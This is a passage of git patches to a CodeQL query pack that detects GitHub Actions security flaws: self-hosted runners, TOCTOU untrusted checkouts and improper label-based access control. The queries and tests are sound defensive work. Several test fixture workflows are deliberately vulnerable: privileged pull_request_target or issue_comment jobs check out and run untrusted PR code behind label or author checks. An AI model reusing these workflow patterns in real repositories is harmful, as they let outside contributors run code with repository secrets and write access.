j.getStrategy().getMatrixVarExpr(fieldName) = result and - j.getAChildNode*() = this + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() ) } } + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll new file mode 100644 index 00000000000..94c6c49a34b --- /dev/null +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -0,0 +1,34 @@ +import actions +import codeql.actions.dataflow.ExternalFlow + +string selfHostedRunnerRegexp() { + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + result = + "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +} + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + not label.regexpMatch(selfHostedRunnerRegexp()) + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.indexOf("self-hosted:true") > 0 + ) +} diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 90997f63631..621b7fb050d 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -11,36 +11,7 @@ * external/cwe/cwe-284 */ -import actions -import codeql.actions.dataflow.ExternalFlow - -/** - * This predicate uses data available in the workflow file to identify self-hosted runners. - * It does not know if the repository is public or private. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate staticallyIdentifiedSelfHostedRunner(Job job) { - exists(string label | - job.getEnclosingWorkflow().getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and - label = job.getARunsOnLabel() and - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - not label - .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") - ) -} - -/** - * This predicate uses data available in the job log files to identify self-hosted runners. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { - exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and - runner_info.matches("self-hosted:true") - ) -} +import codeql.actions.security.SelfHostedQuery from Job job where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 81d614e5122..37eb2bddb58 100644 --- a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -26,3 +26,69 @@ jobs: runs-on: self-hosted-azure steps: - run: cmd + test5: + strategy: + fail-fast: false + matrix: + platform: + - name: Linux + os: ubuntu-latest + shell: bash + - name: macOS + os: macos-latest + shell: bash + - name: Windows + os: windows-latest + shell: cmd + node-version: + - 16.14.0 + - 16.x + - 18.0.0 + - 18.x + - 20.x + runs-on: ${{ matrix.platform.os }} + steps: + - run: cmd + test6: + strategy: + matrix: + os: [ubuntu-latest, macos-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test7: + strategy: + matrix: + os: [self-hosted, ubuntu-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test8: + strategy: + matrix: + settings: + - host: + - 'self-hosted' + - 'macos' + - 'arm64' + target: 'x86_64-apple-darwin' + runs-on: ${{ matrix.settings.host }} + steps: + - run: cmd + test9: + strategy: + matrix: + os: ${{ github.repository }} + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test10: + strategy: + matrix: + os: ${{ github.repository }} + foo: + - bar: ${{ github.repository }} + baz: "asdf" + runs-on: ${{ matrix.foo.bar }} + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected index 920a818ab35..306bed9baec 100644 --- a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected @@ -1,4 +1,8 @@ | .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | | .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | | .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | -| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner | From 9ee9314cb962c8052c41dfded556fe18cf793ee1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 10:37:42 +0200 Subject: [PATCH 0265/1267] Resolve conflicts after rebasing --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 94c6c49a34b..898af1a699a 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -14,7 +14,7 @@ string selfHostedRunnerRegexp() { */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getATriggerEvent() = + job.getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and not label.regexpMatch(selfHostedRunnerRegexp()) From a1efc78ac7d887e5b18ca8ef3bf40409cbf989ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 13:47:01 +0200 Subject: [PATCH 0266/1267] Refactor regexps --- .../actions/security/SelfHostedQuery.qll | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 898af1a699a..e1279189c27 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,10 +1,17 @@ import actions import codeql.actions.dataflow.ExternalFlow -string selfHostedRunnerRegexp() { - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - result = - "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +bindingset[runner] +predicate isGithubHostedRunner(string runner) { + // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images + runner + .toLowerCase() + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") +} + +bindingset[runner] +predicate is3rdPartyHostedRunner(string runner) { + runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$") } /** @@ -15,9 +22,13 @@ string selfHostedRunnerRegexp() { predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | job.getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + [ + "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment", + "pull_request_target", "workflow_run" + ] and label = job.getARunsOnLabel() and - not label.regexpMatch(selfHostedRunnerRegexp()) + not isGithubHostedRunner(label) and + not is3rdPartyHostedRunner(label) ) } From cee0389d6eca33f41b51368601c4d06c0d99fd96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 15:33:28 +0200 Subject: [PATCH 0267/1267] Update SelfHostedQuery.qll MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index e1279189c27..3047ba35b06 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -6,7 +6,7 @@ predicate isGithubHostedRunner(string runner) { // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images runner .toLowerCase() - .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$") } bindingset[runner] From 60769f1671c3b65548eef36f684bf3dc67f3c540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 16:26:53 +0200 Subject: [PATCH 0268/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4..acfc1c7e210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c..efafbbb55ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From b4096e0201307a16775226f8d37f2aa0d79f9907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 09:56:23 +0200 Subject: [PATCH 0269/1267] Refactor control checks --- .../security/UntrustedCheckoutQuery.qll | 45 +++++++++++++++---- 1 file changed, 37 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324..bf60c4a2f7f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -221,17 +221,46 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { +abstract class ControlCheck extends If { } + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' exists( Utils::normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: contains(github.actor, 'dependabot') + // eg: github.triggering_actor != 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", ], _, _) ) } From 7c295e011a31d92dff889e9ffefede2b6a940251 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:19:27 +0200 Subject: [PATCH 0270/1267] TOCTOU queries and tests --- .../UntrustedCheckoutTOCTOUCritical.ql | 25 +++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 25 +++++++++++ .../CWE-367/.github/workflows/comment.yml | 41 +++++++++++++++++++ .../CWE-367/.github/workflows/deployment.yml | 31 ++++++++++++++ .../CWE-367/.github/workflows/label.yml | 17 ++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 2 + .../UntrustedCheckoutTOCTOUCritical.qlref | 1 + .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 1 + 9 files changed, 143 insertions(+) create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql new file mode 100644 index 00000000000..c5e12c0fccc --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout-toctou/critical + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // the checked-out code may lead to arbitrary code execution + checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql new file mode 100644 index 00000000000..b74c3389f9d --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.3 + * @id actions/untrusted-checkout-toctou/high + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // there are no evidences that the checked-out code can lead to arbitrary code execution + not checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml new file mode 100644 index 00000000000..498b46090cb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -0,0 +1,41 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: [ubuntu-latest] + steps: + + # test1 + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + # test2 + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml new file mode 100644 index 00000000000..f0a3035777c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml new file mode 100644 index 00000000000..1f04440d28b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml @@ -0,0 +1,17 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected new file mode 100644 index 00000000000..e3a42b3265d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -0,0 +1,2 @@ +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 00000000000..f924f8fe750 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref new file mode 100644 index 00000000000..6284c786b3a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql From 73fbd2311bc0eaded3f7855037c9249d252f6cf5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:20:04 +0200 Subject: [PATCH 0271/1267] Improper access check queries and tests --- .../Security/CWE-285/ImproperAccessControl.ql | 30 +++++++++++++++++++ .../CWE-285/.github/workflows/test1.yml | 20 +++++++++++++ .../CWE-285/.github/workflows/test2.yml | 20 +++++++++++++ .../CWE-285/ImproperAccessControl.expected | 1 + .../CWE-285/ImproperAccessControl.qlref | 2 ++ 5 files changed, 73 insertions(+) create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.ql create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 00000000000..88ac3cee04d --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -0,0 +1,30 @@ +/** + * @name Improper Access Control + * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/improper-access-control + * @tags actions + * security + * external/cwe/cwe-285 + */ + +import codeql.actions.security.UntrustedCheckoutQuery + +from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +where + job = checkout.getEnclosingJob() and + job.isPrivileged() and + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" and + job.getAStep() = checkout and + ( + checkout.getIf() = check + or + checkout.getEnclosingJob().getIf() = check + ) +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml new file mode 100644 index 00000000000..48833460b44 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml new file mode 100644 index 00000000000..be6a6cf3939 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ labeled ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected new file mode 100644 index 00000000000..53dd12b9fb6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -0,0 +1 @@ +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref new file mode 100644 index 00000000000..09a19f21e3c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -0,0 +1,2 @@ +Security/CWE-285/ImproperAccessControl.ql + From 00f77ca9ecda1661a11a6fb3b3ed005549809445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:36:43 +0200 Subject: [PATCH 0272/1267] Add missing source for peter-murray/issue-body-parser-action --- ...-murray_issue-body-parser-action.model.yml | 6 ++ .../CWE-094/.github/workflows/test3.yml | 61 +++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 ql/lib/ext/peter-murray_issue-body-parser-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml new file mode 100644 index 00000000000..d156d7da658 --- /dev/null +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml new file mode 100644 index 00000000000..40fe86529b0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml @@ -0,0 +1,61 @@ +name: Approve or Deny Marketplace Action Request + +on: + issue_comment: + types: [created] + +jobs: + parse-issue: + runs-on: self-hosted + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ 